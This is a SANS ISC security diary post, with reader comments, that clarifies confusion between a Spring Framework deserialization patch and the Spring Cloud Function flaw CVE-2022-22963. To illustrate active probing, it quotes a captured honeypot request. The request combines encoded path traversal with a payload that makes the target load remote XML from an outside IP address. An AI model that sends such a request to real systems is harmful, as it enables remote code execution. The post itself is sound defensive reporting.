Possible new Java Spring Framework Vulnerability (Updated: not a Spring problem)

Possible new Java Spring Framework Vulnerability (Updated: not a Spring problem)
Last night, news broke that the Java Spring framework may release an update fixing a significant security vulnerability. The project added a patch to the Spring framework GitHub repository that appears to fix a deserialization vulnerability [1]. A blog post published around that time includes some additional details [2]. However, the comment by Sam Brannon released with the git commit (scroll down to the end of the page for [1]) does explain the patch: The purpose of this commit is to inform anyone who had previously been using `SerializationUtils#deserialize` that it is dangerous to deserialize objects from untrusted sources. The core Spring Framework does not use `SerializationUtils` to deserialize objects from untrusted sources. There is no CVE and no official announcement from Spring at this time. But it may be a good idea to find your Log4j notes as your response will likely be similar. Do not confuse this vulnerability with CVE-2022-22963 (I have already seen some posts mixing up the two). CVE-2022-22963 is a vulnerability in Spring Cloud Function, not in the spring framework. It was patched yesterday and appeared already to be probed based on our honeypot. For example, we do see requests like this: THIS IS CVE-2022-22963, NOT spring4shell `POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 Host: a.b.c.d:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Connection: close Content-Length: 147 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://45.67.230.64/wb.xml")` [1] https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529#diff-6c2618839eda075efe4491842d3673eab8fe1e342f6d9ddc2bbda8556e595864L153 [2] https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html --- Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu Twitter\| I will be teaching next: Application Security: Securing Web Apps, APIs, and Microservices - SANSFIRE 2022	Johannes 4511 Posts ISC Handler Mar 30th 2022
Thread locked Subscribe	Mar 30th 2022 3 months ago
The headline makes it seem like "nothing to see here" rather than there are actually two different vulnerabilities, one of which IS in the Spring framework. Also, the text "Do not confuse this vulnerability with CVE-2022-22963" could be rewritten to include the other CVE so you could easily refer to both.	Anonymous
Quote	Mar 30th 2022 3 months ago
Do you know the CVSS?	Perfect 1 Posts
Quote	Mar 30th 2022 3 months ago

Last night, news broke that the Java Spring framework may release an update fixing a significant security vulnerability. The project added a patch to the Spring framework GitHub repository that appears to fix a deserialization vulnerability [1].

A blog post published around that time includes some additional details [2]. However, the comment by Sam Brannon released with the git commit (scroll down to the end of the page for [1]) does explain the patch:

The purpose of this commit is to inform anyone who had previously been using SerializationUtils#deserialize that it is dangerous to deserialize objects from untrusted sources.

The core Spring Framework does not use SerializationUtils to deserialize objects from untrusted sources.
There is no CVE and no official announcement from Spring at this time. But it may be a good idea to find your Log4j notes as your response will likely be similar.

Do not confuse this vulnerability with CVE-2022-22963 (I have already seen some posts mixing up the two). CVE-2022-22963 is a vulnerability in Spring Cloud Function, not in the spring framework. It was patched yesterday and appeared already to be probed based on our honeypot. For example, we do see requests like this:

THIS IS CVE-2022-22963, NOT spring4shell

POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 Host: a.b.c.d:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Connection: close Content-Length: 147 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://45.67.230.64/wb.xml")

[1] https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529#diff-6c2618839eda075efe4491842d3673eab8fe1e342f6d9ddc2bbda8556e595864L153
[2] https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

I will be teaching next: Application Security: Securing Web Apps, APIs, and Microservices - SANSFIRE 2022

Johannes

4511 Posts
ISC Handler

Mar 30th 2022

The headline makes it seem like "nothing to see here" rather than there are actually two different vulnerabilities, one of which IS in the Spring framework. Also, the text "Do not confuse this vulnerability with CVE-2022-22963" could be rewritten to include the other CVE so you could easily refer to both.

Anonymous

Do you know the CVSS?

Perfect

1 Posts